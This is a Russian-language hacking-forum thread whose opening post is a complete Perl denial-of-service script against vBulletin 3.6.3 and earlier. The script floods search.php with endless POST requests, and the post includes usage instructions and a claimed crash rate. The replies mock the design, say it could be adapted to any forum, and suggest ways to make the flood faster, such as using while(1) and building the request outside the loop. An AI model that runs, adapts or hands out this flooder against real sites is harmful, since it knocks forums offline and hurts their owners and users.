Форум АНТИЧАТ - VBulletin DoS Exploit

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - VBulletin DoS Exploit (https://forum.antichat.xyz/showthread.php?t=27343)

VBulletin DoS Exploit

Код:

# VBulletin DoS Exploit by www.h4x0r.ir 

# 

# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works ;) 

# 

# important => Image Verification in (search.php) is NOT Enabled. 



# It works on 3.6.3 and prior [all] ! 

# 

#Perl Script 

use Socket; 

if (ARGV < 2) { &usage; } 

$rand=rand(10); 

$host = $ARGV[0]; 

$dir = $ARGV[1]; 

$host =~ s/(http:\/\/)//eg; 

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) 

{ 

$user="h4x0r".$rand.$i; 

$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; 

$len = length $data; 

$foo = "POST ".$dir."search.php HTTP/1.1\r\n". 

               "Accept: */*\r\n". 

               "Accept-Language: en-gb\r\n". 

               "Content-Type: application/x-www-form-urlencoded\r\n". 

               "Accept-Encoding: gzip, deflate\r\n". 

               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". 

               "Host: $host\r\n". 

               "Content-Length: $len\r\n". 

               "Connection: Keep-Alive\r\n". 

               "Cache-Control: no-cache\r\n\r\n". 

 "$data"; 

     my $port = "80"; 

     my $proto = getprotobyname('tcp'); 

     socket(SOCKET, PF_INET, SOCK_STREAM, $proto); 

     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; 

     send(SOCKET,"$foo", 0); 

     syswrite STDOUT, "|" ; 



} 

print "\n\n"; 

system('ping $host'); 

sub usage { 

print "\tusage: \n"; 

print "\t$0 <host> </dir/>\n"; 

print "\tex: $0 127.0.0.1 /forum/\n"; 

print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; 

print "\th4x0r Security Team\n"; 

print "\twww.h4x0r.ir\n\n"; 



exit(); };

Exploit By www.h4x0r.ir

что под все версии катит штоли?

Цитата:

Сообщение от Kalowrat

что под все версии катит штоли?

Нет :
3.6.3

ха ха ха, прикольно :)

хммм.. интересно как много в инете версий 3.6.3
))

Мда, ваще гениальный сплойтенг умнее предумать они не догодались точно.
Таким же макаром у любого форума и в любом месте можно базу снести на время, делать щоль им нехер блин.

>for ($i=0; $i<99999999999999999999999999999999999999999999999 999
Гениально

Только одно не понятно - почему Exploit? Под сплойтом вроде как понимается повышение привелегий. Досер он и в африке досер. Кто-то выкладывал досер панББ, так небольшие модификауии и можно досеры под все форумы зарубить....

Флудер и все, максимум как можно назвать это чудо, а по данной технологии частенько и досят сайт хотя досом назвать не легко.

Цитата:

for ($i=0; $i<99999999999999999999999999999999999999999999999 999 99999999999999999999; $i++)

убийцы.. это не POST ddoser уже.. и написать такой можно для любого форума )

ну есле уж на то пошло:

Код:

for ($i=0; $i<99999999999999999999999999999999999999999999999999 99999999999999999999; $i++)

не прощи ли написать while(1)

Цитата:

Сообщение от _-[A.M.D]HiM@S-_

Нет :
3.6.3

а помоему под любую подогнать можно))

и строки:

Код:

$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; 

$len = length $data; 

$foo = "POST ".$dir."search.php HTTP/1.1\r\n". 

               "Accept: */*\r\n". 

               "Accept-Language: en-gb\r\n". 

               "Content-Type: application/x-www-form-urlencoded\r\n". 

               "Accept-Encoding: gzip, deflate\r\n". 

               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". 

               "Host: $host\r\n". 

               "Content-Length: $len\r\n". 

               "Connection: Keep-Alive\r\n". 

               "Cache-Control: no-cache\r\n\r\n". 

 "$data";

можно за цикл вынести, "быстрее" будет